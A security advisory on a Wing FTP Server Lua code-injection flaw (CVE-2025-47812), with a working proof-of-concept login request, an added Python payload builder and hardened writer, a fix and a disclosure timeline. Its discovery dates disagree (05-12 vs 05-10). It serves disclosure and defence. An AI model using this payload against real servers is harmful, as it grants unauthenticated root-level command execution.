Wing FTP Server Arbitrary Code Injection in User Session Files Leading to Remote Code Execution.
Jun 30, 2025 · By Julien Ahrens
ADVISORY INFORMATION
- Product: Wing FTP Server
- Vendor URL: https://www.wftpserver.com
- CWE: Code Injection [CWE-94]
- Date found: 2025-05-12
- Date published: 2025-06-30
- CVSSv4 Score: 10.0 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
- CVE: CVE-2025-47812
CREDITS
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.
VERSIONS AFFECTED
Wing FTP Server <= 7.4.3
INTRODUCTION
Wing FTP Server is a free, easy-to-use, and secure FTP server software for Windows, Linux, and Mac OS. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. And it provides admins with a web-based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server.
(from the vendor’s homepage)
VULNERABILITY DETAILS
The endpoint at "/loginok.html" does not properly handle NULL bytes in the "username" parameter: the credential check stops at the NULL byte, while the remainder of the value is written unsanitised into the user's Lua session file. An attacker can therefore terminate the string that holds the username and inject arbitrary Lua code, which the server later executes.
Successful exploitation allows an unauthenticated attacker to execute arbitrary commands on the underlying server. Because Wing FTP Server runs as root on Linux and as NT AUTHORITY\SYSTEM on Windows by default, this amounts to a total compromise of the host. The proof of concept below logs in as the anonymous user, so if anonymous FTP access is enabled the attack needs no credentials at all and is a fully unauthenticated Remote Code Execution.
For a detailed write-up, see the referenced blog post.
PROOF OF CONCEPT
A request exploiting this vulnerability looks like the following. The "]]" after the NULL byte closes the Lua string the username is written into, the "%0d"-separated lines are the injected Lua, and the trailing "--" comments out the remainder of the original line:
POST /loginok.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 128

username=anonymous%00]]%0dlocal+h+%3d+io.popen("id")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=correct
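The following Python script is an added example written for this page; it is not code from the advisory, from RCE Security or from Wing FTP Server. It rebuilds the proof-of-concept body above from its parts, shows the two views of the username that the bug hinges on (what the credential check sees versus what the session file receives), and places a hardened session writer beside a simulated vulnerable one. The real session-file layout is not on the page, so the line _SESSION["username"] = [[...]] used below is an assumption inferred from the "]]" and trailing "--" in the payload; modelling the credential check as a NUL-terminated C string is likewise an assumption.

```python
"""Added example, not code from the advisory or from Wing FTP Server.

Assumptions (not on the page): the session writer emits
_SESSION["username"] = [[...]] (a Lua long-bracket string), and the
credential check stops at the first NUL while the writer copies the whole
buffer."""
from urllib.parse import parse_qs

# Body exactly as printed in the advisory, kept for comparison.
PAGE_BODY = ('username=anonymous%00]]%0dlocal+h+%3d+io.popen("id")%0dlocal+r+%3d+'
             'h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=correct')


def form_encode(value: str) -> str:
    """Percent-encode the way the PoC does: lowercase hex, space as '+', and
    ( ) " * . - _ [ ] left literal (a server decodes %5d and ] identically)."""
    out = []
    for b in value.encode():
        c = chr(b)
        if (c.isascii() and c.isalnum()) or c in '()"*.-_[]':
            out.append(c)
        elif c == " ":
            out.append("+")
        else:
            out.append(f"%{b:02x}")
    return "".join(out)


def build_lua_injection(command: str) -> str:
    """Lua that, written after the NUL, closes the [[ string the username sits
    in, runs `command`, and comments out whatever the writer appends."""
    lines = [
        "]]",
        f'local h = io.popen("{command}")',
        'local r = h:read("*a")',
        "h:close()",
        "print(r)",
        "--",
    ]
    return "\r".join(lines)


def build_request_body(command: str = "id", user: str = "anonymous",
                       password: str = "correct") -> str:
    """Assemble the username=...&password=... body of the PoC request."""
    username = user + "\x00" + build_lua_injection(command)
    return "username=" + form_encode(username) + "&password=" + form_encode(password)


def parse_login(body: str) -> str:
    """Server side: decode the form and return the raw username, NUL included."""
    return parse_qs(body, keep_blank_values=True)["username"][0]


def c_string(value: str) -> str:
    """What a NUL-terminated C API sees: everything before the first NUL."""
    return value.split("\x00", 1)[0]


def vulnerable_session_file(raw_username: str) -> str:
    """Simulated vulnerable writer (assumed layout): the login check accepted
    c_string(raw_username), but the file receives the untruncated buffer
    inside a Lua long-bracket string, so a `]]` in it ends the string early."""
    return f'_SESSION["username"] = [[{raw_username}]]\r'


def lua_after_username(session_text: str) -> str:
    """Everything after the first `]]`: empty for a benign name,
    attacker-controlled Lua after the injection."""
    return session_text.partition("]]")[2].strip("\r\n")


def hardened_session_file(raw_username: str) -> str:
    """Hardened writer: validate the buffer the file will actually contain,
    not the truncated view the authentication code saw, and emit a quoted
    string with escapes so `]]` can never terminate it."""
    if c_string(raw_username) != raw_username:
        raise ValueError("embedded NUL in username")
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in raw_username):
        raise ValueError("control character in username")
    escaped = raw_username.replace("\\", "\\\\").replace('"', '\\"')
    return f'_SESSION["username"] = "{escaped}"\r'


if __name__ == "__main__":
    raw = parse_login(build_request_body("id"))
    print("auth check sees :", repr(c_string(raw)))
    print("file receives   :", repr(raw))
    print("injected Lua    :", lua_after_username(vulnerable_session_file(raw)))
```

The point of the hardened writer is not the quoting alone: the check has to run on the bytes that reach the file, because any validation applied to the NUL-truncated view the login code used would pass "anonymous" and miss everything after the NULL byte.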
SOLUTION
Update to version 7.4.4 or later, which fixes the vulnerability.
REPORT TIMELINE
- 2025-05-10: Discovery of the vulnerability
- 2025-05-10: MITRE assigns CVE-2025-47812
- 2025-05-12: Contacted the vendor via their support@
- 2025-05-12: Vendor confirms the issue as a critical bug
- 2025-05-14: Vendor releases version 7.4.4 which fixes the vulnerability
- 2025-05-14: Vendor asks to extend the disclosure date by one month
- 2025-05-15: RCE Security states that the planned disclosure date, already more than a month ahead, is sufficient
- 2025-06-30: Full Disclosure